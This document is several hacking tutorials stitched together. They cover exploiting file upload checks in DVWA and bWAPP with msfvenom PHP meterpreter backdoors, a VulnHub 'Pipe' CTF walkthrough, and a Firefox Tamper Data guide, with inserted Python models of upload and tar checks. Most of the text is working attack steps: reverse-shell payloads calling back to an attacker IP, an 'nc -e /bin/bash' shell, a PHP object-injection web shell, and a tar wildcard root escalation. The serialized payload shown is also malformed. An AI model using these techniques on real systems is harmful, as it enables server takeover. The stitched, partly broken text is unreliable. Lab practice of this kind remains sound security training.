5 Ways to Exploit a File Upload Vulnerability



File upload vulnerabilities are a major problem in web applications. In many cases the upload feature is there by design, but it lets an attacker upload a file containing malicious code that is then executed on the server. With that, an attacker might plant a phishing page on the website or deface it.

The attacker may also expose internal information about the web server, and in some cases sensitive data may be disclosed to unauthorized people.

In this tutorial we are going to discuss various kinds of file upload vulnerability and then try to exploit them. You will learn the different injection techniques for getting a malicious PHP file onto a web server and executing it.
Basic file upload Technique

In this scenario a simple PHP file is uploaded to the web server without any restrictions: the server checks neither the Content-Type nor the extension of the uploaded file.

For example, if the server is meant to accept a text file or an image (which it treats as data) but places no restrictions on the Content-Type or filename, you can just as easily upload a malicious PHP file, which the web server treats as an application and runs.

Let’s start!!!
Click on DVWA Security and set the security level to low.

Open a terminal in Kali Linux and generate a PHP backdoor with the following command:

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.104 lport=4444 -f raw

Copy the generated code into leafpad and save it with a PHP extension as img.php on the desktop.

Launch the Metasploit Framework with msfconsole and start a multi/handler listener.


Come back to your DVWA lab and click the File Upload option in the vulnerability menu.

Now click Browse, select img.php, and click Upload to send the file to the web server.



After the upload, DVWA shows the directory path where the file was stored. Copy that path and append it to the site URL to execute the file:

hackable/uploads/img.php


msf > use multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.104
msf exploit(handler) > set lport 4444
msf exploit(handler) > exploit
meterpreter > sysinfo

You can see that meterpreter session 1 on the victim PC has opened in Metasploit.


Double extension injection Technique

Click on DVWA Security and set the security level to medium.

Here we run into an application that inspects the upload. At medium security DVWA only accepts files that the browser declares as image/jpeg or image/png (a type the browser derives from the .jpeg or .png extension), so a file with a single .php extension is rejected. There are still some techniques that get a malicious PHP file onto the web server.



The idea is to hide the real nature of a file by giving it more than one extension, which confuses simple checks. For example, img1.php.png looks like a PNG image (data, not an application), so the browser attaches an image Content-Type and the server's check passes; the filename is then changed to img1.php in the intercepted request so that the server stores and executes it as PHP.

Let’s continue!!!

Repeat the same process to create the PHP backdoor with msfvenom, save it as img1.php.png on the desktop, and run multi/handler in the background.

This upload is done at medium security, which differs from low security in that the request is inspected (the declared type and the filename) before the file is accepted.

Click the File Upload option in the vulnerability menu, then click Browse and select img1.php.png. Now start Burp Suite and turn intercept on under the Proxy tab. Don't forget to set your browser to use Burp as a manual proxy, then click Upload.
 



The Intercept tab catches the POST request sent when you click Upload. Change img1.php.png to img1.php in the filename field of the intercepted request; the Content-Type line that the browser set from the .png extension stays as it is.


Compare the request before and after the change, then click Forward to upload the PHP file into the directory.


After the upload, DVWA shows the directory path where the file was stored. Copy that path and append it to the site URL to execute the file:

hackable/uploads/img1.php


Opening that URL in the browser gives you meterpreter session 2.
 meterpreter > sysinfo


Content-Type File Upload

The "Content-Type" header indicates the media type of the message body. Some web applications use this value to decide whether a file is valid; for instance, they only accept files whose Content-Type is "text/plain" or an image type. For a multipart upload the value that matters is the Content-Type of the file part, which the browser fills in from the file extension. This check can be bypassed by changing the header in the request with a web proxy.

Again repeat the same process to create the PHP backdoor with msfvenom, save it as img2.php on the desktop, and run multi/handler in the background.


Start Burp Suite and intercept the upload request as before. In the screenshot you can read the Content-Type of the PHP file part; change application/x-php to image/png to get the PHP file accepted.




In the image below you can see the manipulated Content-Type; this is known as content-type injection.


Now copy the uploaded path and paste it into the URL to execute it.
hackable/uploads/img2.php


Opening that URL in the browser gives you meterpreter session 3.
 meterpreter > sysinfo


Null byte Injection

Null byte injection is an exploitation technique that adds a URL-encoded null byte (%00, that is 0x00 in hex) to user-supplied data. The null byte is the NUL character, not a space. It can alter the intended logic of the application and allow an attacker to gain unauthorized access to files on the system.

Here I append a placeholder character to the extension, look up its hex value, and then replace that hex value with a null byte (00). The reason this works is that some server-side languages still pass the filename to C/C++ library functions, and in C a string ends at the first \0 (null byte).

So when such a function reads a null byte in the filename, it assumes it has reached the end of the string and stops there: img3.php\0.jpg is saved as img3.php, while the check that ran on the full name saw a .jpg extension. Note that this only works against PHP versions before 5.3.4, whose filesystem functions did not reject paths containing a null byte.
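To make the double extension, Content-Type and null byte bypasses above concrete, here is an added Python model (it is not DVWA's code) of the checks they defeat: a check that trusts the client-supplied Content-Type of the file part (what DVWA's medium level does), a check that looks only at the last extension of the declared name, and a filesystem layer that stores the name through a C-style string that stops at the first NUL. The double extension sample is shown both as the browser sends it and after the rename in Burp, which is also the request the Content-Type section produces. The image magic bytes, the list of extensions the Apache handler maps to PHP, and the sample uploads are assumptions constructed for this example.

```python
import os
import secrets

# Types and extensions the upload form is meant to accept.
IMAGE_TYPES = {"image/jpeg", "image/png"}
IMAGE_EXTS = {"jpg", "jpeg", "png"}
# Assumed list of extensions a typical Apache+PHP handler passes to the interpreter.
PHP_EXTS = {"php", "php3", "php4", "php5", "php7", "phtml"}
# Leading bytes of the two allowed image formats (constructed table).
MAGIC = {b"\x89PNG\r\n\x1a\n": "png", b"\xff\xd8\xff": "jpg"}


def last_extension(name):
    """Extension after the final dot, lower-cased; '' if there is no dot."""
    return name.rsplit(".", 1)[-1].lower() if "." in name else ""


def check_type_only(name, content_type, data):
    """Weak check 1: trusts the Content-Type the client put on the file part
    (the browser derives it from the extension, and a proxy can rewrite it)."""
    return content_type in IMAGE_TYPES and len(data) < 100000


def check_last_ext(name, content_type, data):
    """Weak check 2: looks only at the final extension of the declared name."""
    return last_extension(name) in IMAGE_EXTS


def c_string(s):
    """What a C-style string function sees: everything up to the first NUL."""
    return s.split("\x00", 1)[0]


def saved_name(name):
    """Name the weak checks would store: basename of the NUL-truncated string."""
    return os.path.basename(c_string(name))


def runs_with_addhandler(saved):
    """AddHandler-style config: any extension in the name selects the PHP
    handler, so a.php.png is still executed."""
    return any(seg.lower() in PHP_EXTS for seg in saved.split(".")[1:])


def runs_with_filesmatch(saved):
    """FilesMatch \\.php$-style config: only the last extension counts."""
    return last_extension(saved) in PHP_EXTS


def check_strict(name, content_type, data):
    """Hardened check: ignore the client's name and type, verify the image
    magic bytes, and return a random server-chosen filename (None = reject)."""
    if "\x00" in name or "/" in name or "\\" in name or len(data) >= 100000:
        return None
    for magic, ext in MAGIC.items():
        if data.startswith(magic):
            return "%s.%s" % (secrets.token_hex(16), ext)
    return None


# Constructed sample uploads: declared filename, declared part Content-Type, body.
PNG_BODY = b"\x89PNG\r\n\x1a\n" + bytes(16)
PHP_BODY = b"<?php system($_GET['cmd']); ?>"
SAMPLES = {
    "plain_php":        ("img.php",          "application/x-php", PHP_BODY),
    "double_ext":       ("img1.php.png",     "image/png",         PHP_BODY),
    "renamed_in_proxy": ("img1.php",         "image/png",         PHP_BODY),
    "null_byte":        ("img3.php\x00.jpg", "image/jpeg",        PHP_BODY),
    "real_image":       ("photo.png",        "image/png",         PNG_BODY),
}


def evaluate(sample):
    """Run one sample through every check and report what would happen."""
    name, ctype, body = SAMPLES[sample]
    stored = saved_name(name)
    return {
        "type_only": check_type_only(name, ctype, body),
        "last_ext": check_last_ext(name, ctype, body),
        "stored_as": stored,
        "runs_addhandler": runs_with_addhandler(stored),
        "runs_filesmatch": runs_with_filesmatch(stored),
        "strict": check_strict(name, ctype, body) is not None,
    }


if __name__ == "__main__":
    for s in SAMPLES:
        print(s, evaluate(s))
```

The output shows why the rename in Burp matters: img1.php.png as sent passes both weak checks but only executes under an AddHandler-style configuration, whereas img1.php with a forged image type executes under either; the null byte name passes both checks yet is stored as img3.php. Only the strict check, which ignores what the client claims, rejects every malicious sample and still accepts the real image.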

Now create the PHP backdoor with msfvenom, save it as img3.php.jpg on the desktop, and run multi/handler in the background.
 
Start Burp Suite and intercept the upload request as before. The request looks the same as in the double extension case, but the technique is different.


Add any character to the filename as shown in the screenshot: in the highlighted text I have changed img3.php.jpg to img3.phpD.jpg. The next step is to turn that character into a null byte.


Next we look up the inserted character in the decoder: as the screenshot shows, the hex value of 'D' is 44.


Now click the Hex option in the Intercept tab, which shows the intercepted request as hex. Find the bytes of the filename (highlighted) and replace the 44 with the null byte value 00.


The screenshot shows the change: the null byte now sits where the hex value of the placeholder character was.


Switching back to the raw view, you can see that the 'D' has become a null byte.


Now forward the intercepted request to exploit the upload through null byte injection. Great!!! We have bypassed medium security; copy the uploaded path and paste it into the URL to execute it.


When you open that path you get a reverse connection in Metasploit; as the screenshot shows, I have got meterpreter session 4 as well.



Blacklisting File Extensions

The next target is bWAPP, another vulnerable web application. Set the security level to medium, choose Unrestricted File Upload from the bug list, and click Hack.

Some server-side code checks the filename for a .php extension and only allows files that do not end in .php, that is, a blacklist. Such a check can be bypassed by changing the case of some letters if the comparison is case-sensitive, for example PHp, or by using an alternative extension that the server still hands to the PHP interpreter, such as .php3 (which extensions are executed depends on the server's handler configuration).
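As an added example (not bWAPP's code), the following Python compares three blacklist implementations with an allowlist against the kinds of filenames mentioned above. The set of extensions the server executes as PHP is an assumption modelled on a typical Apache AddHandler line.

```python
import re

# Assumed Apache handler list: extensions served through the PHP interpreter.
PHP_HANDLER_EXTS = {"php", "php3", "php4", "php5", "php7", "phtml"}
# Constructed candidate names an attacker might try.
CANDIDATES = ["img4.php", "img4.PHp", "img4.php3", "img4.phtml", "img4.php.png", "img4.png"]


def blacklist_case_sensitive(name):
    """Rejects only an exact lowercase .php suffix."""
    return not name.endswith(".php")


def blacklist_case_insensitive(name):
    """Same check after lower-casing: closes the PHp trick only."""
    return not name.lower().endswith(".php")


def blacklist_php_variants(name):
    """Blacklist extended to the usual alternates; still only as good as the list."""
    return re.search(r"\.ph(p[3-7]?|tml)$", name, re.IGNORECASE) is None


def allowlist(name):
    """Accept a simple base name plus exactly one image extension."""
    return re.fullmatch(r"[A-Za-z0-9_-]+\.(jpe?g|png)", name, re.IGNORECASE) is not None


def server_runs_as_php(name):
    """Last-extension handler lookup (the AddHandler multi-extension case aside)."""
    return name.rsplit(".", 1)[-1].lower() in PHP_HANDLER_EXTS


def accepted(check):
    """Candidate names the check lets through."""
    return [n for n in CANDIDATES if check(n)]


def bypasses(check):
    """Candidate names the check accepts that the server would still execute."""
    return [n for n in CANDIDATES if check(n) and server_runs_as_php(n)]


if __name__ == "__main__":
    for check in (blacklist_case_sensitive, blacklist_case_insensitive,
                  blacklist_php_variants, allowlist):
        print("%-26s accepts %s, executable: %s"
              % (check.__name__, accepted(check), bypasses(check)))
```

Each blacklist fix closes one trick and leaves the next open; the allowlist accepts only img4.png because it describes what a valid upload looks like rather than enumerating what a bad one looks like.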


Now create the PHP backdoor with msfvenom, save it as img4.php3 on the desktop, and run multi/handler in the background.

Then browse to img4.php3 and click Upload. At medium security bWAPP lets this file through, and the screenshot shows the PHP file uploaded successfully. Click the link to the file and you get a reverse connection at the multi handler.



msf > use multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.104
msf exploit(handler) > set lport 4444
msf exploit(handler) > exploit
meterpreter > sysinfo

Great!!! You can see I have got meterpreter session 1.


Source: https://www.owasp.org/index.php/Unrestricted_File_Upload


Hack the Pipe VM (CTF Challenge)


Hello friends, today we are going to solve another CTF challenge, PIPE from VulnHub, designed by Sagi. The challenge is not very hard and its difficulty is labelled medium. Solving this lab will give you good penetration testing experience.
You can download it from here: https://www.vulnhub.com/entry/devrandom-pipe,124/
Penetration Methodology:
Network Scanning (Nmap,Netdiscover)
Abusing HTTP service (Burp Suite)

Let’s Begin!!
Start with the netdiscover command to identify the target IP on the local network; in my network the target is 192.168.1.104, yours will differ.
netdiscover




Next, enumerate the open ports and services on the target with the following nmap command:
nmap -p- -A 192.168.1.104 --open
Here we find ports 22, 80, 111 and 54073 open.




Now open the target IP in the browser, since port 80 is open. The site responds with an unauthorized message and a login prompt; the prompt reads "the site says: index.php", which we will use later.




Now we use Burp Suite to capture the login page request, after setting Firefox to use Burp as a manual proxy. With the request intercepted, we change the HTTP method from GET to POST.




As shown in the image below, replace GET /index.php with POST /index.php and forward the intercepted request.




Ok! That step leads us to a page showing a picture of a pipe with a "Show artist info" link below it.




Since nothing else is visible on the page, we open the page source. It references a script at scriptz/php.js.




Now open the target IP with /scriptz in the browser; the directory listing shows a couple of files. Download both for further enumeration.



First we open php.js and find that it serializes some data; then we open log.php.bak, which handles that serialized data on the PHP side.
A Google search for this pattern turned up deserialization vulnerabilities. The format here is PHP's serialize() output (the O:3:"Log" object below), so what applies is PHP object injection.




Now return to the original web page, click the link below the pipe image, and capture that request in Burp.




Select the parameter and send it to Decoder (smart decode). The red-highlighted text is the decoded value, shown in the bottom window; this serialized object is what we alter so that our malicious code is written to the server.




Now replace the parameter with the following serialized Log object for remote code execution (each s:N prefix is the byte length of the string that follows and must match exactly) and forward the request.
O:3:"Log":2:{s:8:"filename";s:31:"/var/www/html/scriptz/shell.php";s:4:"data";s:60:" '; system($_GET['cmd']); echo '
'; ?>";}



Check that shell.php now exists in the accessible scriptz directory.




Now that the shell is in place, open it and see what it gives us. Since the code runs whatever is passed in the cmd parameter, we pass the command in the URL:

cmd=id

It prints the id of the current user, www-data.



Now let's try to get a shell on the victim machine with a netcat reverse shell payload, where 192.168.1.107 is the attacker's IP: nc 192.168.1.107 1234 -e /bin/bash




Then start a netcat listener on the attacker machine and run the payload through the cmd parameter to get a shell on the victim.
nc -lvp 1234
As you can see, we have compromised the target machine. Upgrade the shell to a proper tty with the following command (this does not give root yet):
python -c 'import pty; pty.spawn("/bin/sh")'
Then we check for cron jobs with cat. /etc/crontab runs the script /usr/bin/compress.sh, which is world-readable, so we read it and follow the steps below.
cat /etc/crontab
cat /usr/bin/compress.sh




cd /home/rene/backup
ls
echo "chmod u+s /usr/bin/find" > test.sh
echo "" > "--checkpoint-action=exec=sh test.sh"
echo "" > --checkpoint=1
ls -al /usr/bin/find
touch raj
find raj -exec "/bin/sh" \;
Yuppie!! We got root access. The cron job runs tar over the contents of the backup directory, so the two filenames are read as tar options and test.sh runs as root, making find SUID; find's -exec then spawns a root shell.
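Why those filenames hijack the cron job, as an added Python example (not part of the walkthrough): the page does not show compress.sh, so this assumes the usual form, a tar run over the backup directory with a * wildcard. The shell expands * before tar starts, so names beginning with -- arrive in argv as options; ending option parsing with -- is the fix.

```python
import os
import tempfile

# Assumed shape of the cron job's tar command; compress.sh itself is not on the page.
TAR_PREFIX = ["tar", "cf", "/tmp/backup.tar"]


def stage(directory):
    """Drop the three files the walkthrough creates in /home/rene/backup."""
    with open(os.path.join(directory, "test.sh"), "w") as fh:
        fh.write("chmod u+s /usr/bin/find\n")
    for name in ("--checkpoint-action=exec=sh test.sh", "--checkpoint=1"):
        open(os.path.join(directory, name), "w").close()


def glob_star(directory):
    """What the shell substitutes for *: non-hidden names, sorted."""
    return sorted(n for n in os.listdir(directory) if not n.startswith("."))


def vulnerable_argv(directory):
    """`tar cf /tmp/backup.tar *`: filenames land in argv unprotected."""
    return TAR_PREFIX + glob_star(directory)


def hardened_argv(directory):
    """`tar cf /tmp/backup.tar -- *`: -- ends option parsing, so every later
    argument is a file name even if it starts with a dash."""
    return TAR_PREFIX + ["--"] + glob_star(directory)


def injected_options(argv):
    """Arguments tar would treat as options: dash-prefixed ones before any --."""
    opts = []
    for arg in argv[len(TAR_PREFIX):]:
        if arg == "--":
            break
        if arg.startswith("-"):
            opts.append(arg)
    return opts


def demo():
    """Stage the files in a scratch directory and compare both invocations."""
    directory = tempfile.mkdtemp()
    stage(directory)
    return (injected_options(vulnerable_argv(directory)),
            injected_options(hardened_argv(directory)))


if __name__ == "__main__":
    bad, good = demo()
    print("options smuggled into the vulnerable job:", bad)
    print("options smuggled into the hardened job:  ", good)
```

With the two option-shaped names in argv, GNU tar emits a checkpoint after the first record and runs the exec action as the cron user. Prefixing the glob as ./* is the alternative for tools that do not honour --.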




Finally, open flag.txt and we have our flag.
Mission accomplished!


Web Penetration Testing with Tamper Data (Firefox Add-on)

One of the more popular hacking tools for Firefox is an add-on called Tamper Data. It isn't a complicated tool; it is simply a proxy that sits between the user and the website or web application they are browsing.

All those GETs and POSTs can be manipulated without the constraints imposed by the user interface seen in the browser.

It allows a person to tamper with the data being sent between the client and the server. When Tamper Data is started and a web app or website is loaded in Firefox, it shows all the fields that allow user input or manipulation.

Hackers can then change a field to an "alternate value" and send the data to the server to see how it reacts.

Installing Tamper Data Add-On


Select the menu bar on the right end in Firefox. Click on Add-ons.


In the search field, search for the Tamper Data add-on and click Install. After the add-on is installed, restart Firefox.


Displaying clear text password in Facebook using Tamper Data

Now I try to log in to my Facebook account. When I type my password I only see it as dots, so I want to check whether what I typed is correct. Click Tools in the menu bar and select Tamper Data to capture the request.


A Tamper Data window opens; click Start Tamper to begin capturing outgoing requests. The username and password are sent in a POST request, so now click Login to send the data.


When the browser sends the request a pop-up appears; click Tamper to capture the outgoing request.


In the right half of the Tamper pop-up you can see the email and pass fields in clear text. This is the request as it leaves your own browser, before TLS encrypts it on the wire; it shows what you typed, not a weakness in the site.


HTML Injection - Reflection POST method with Tamper Data

I have installed bWAPP on a WAMP server running on localhost, so it can be reached from the browser. Navigate to the login page at localhost/bWAPP/login.php.

Log in to the web application with bee / bug as credentials, then choose "HTML Injection - Reflected (POST)" from the list of bugs and click Hack.


In given text field enter first name: kunal and last name: bhal.


Before clicking Go, start Tamper Data again so that we can change the field values once the POST data is captured.

Now click Go; a dialog box opens, and you click Tamper to capture the request.


In the captured request shown in the screenshot you can read the first and last name, kunal and bhal.


Tamper Data lets you modify your browser's request before it reaches the server, so I change the first and last name to first and last and click OK to forward the request.


The modified request has now been forwarded to the web server.


The name was changed successfully; the page now shows "first last". You can use Tamper Data with the other bWAPP modules in the same way.


File upload using tamper data
Now open DVWA in your browser at 192.168.1.102:81/DVWA and log in with the following credentials:

Username – admin
Password – password

Click on DVWA Security, set the security level to medium, then select the File Upload vulnerability.
Open a terminal in Kali Linux and generate a PHP backdoor with the following command:

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.103 lport=4444 -f raw

Copy the generated code into leafpad and save it as hacked.php.png on the desktop.

Load metasploit framework type msfconsole and start multi handler.


Now click Browse and select hacked.php.png for upload.


Click on tools option from menu bar and select tamper data to capture the request.


Before clicking Upload, start Tamper Data, then click Upload. When the browser sends the request a pop-up appears; click Tamper to intercept it.


In the screenshot Tamper Data has captured the POST request; copy the selected data from the POST DATA field.


Paste the POST DATA into a text file to change the extension of the upload. The filename reads hacked.php.png, but we want to upload a PHP file.


Change hacked.php.png to hacked.php in the pasted POST DATA, then select and copy the complete data.


Paste the whole text back into the POST DATA field and click OK.


The modified request has been forwarded; now click Stop Tamper.


The screenshot shows that the PHP file was stored in the uploads directory. Copy the highlighted path /hackable/uploads/hacked.php and open it in the browser to execute it:

http://192.168.1.102:81/DVWA/hackable/uploads/hacked.php


You will get a reverse connection from the victim in Metasploit:
msf > use multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.103
msf exploit(handler) > set lport 4444
msf exploit(handler) > run

meterpreter > sysinfo

I have got a meterpreter session on the victim PC.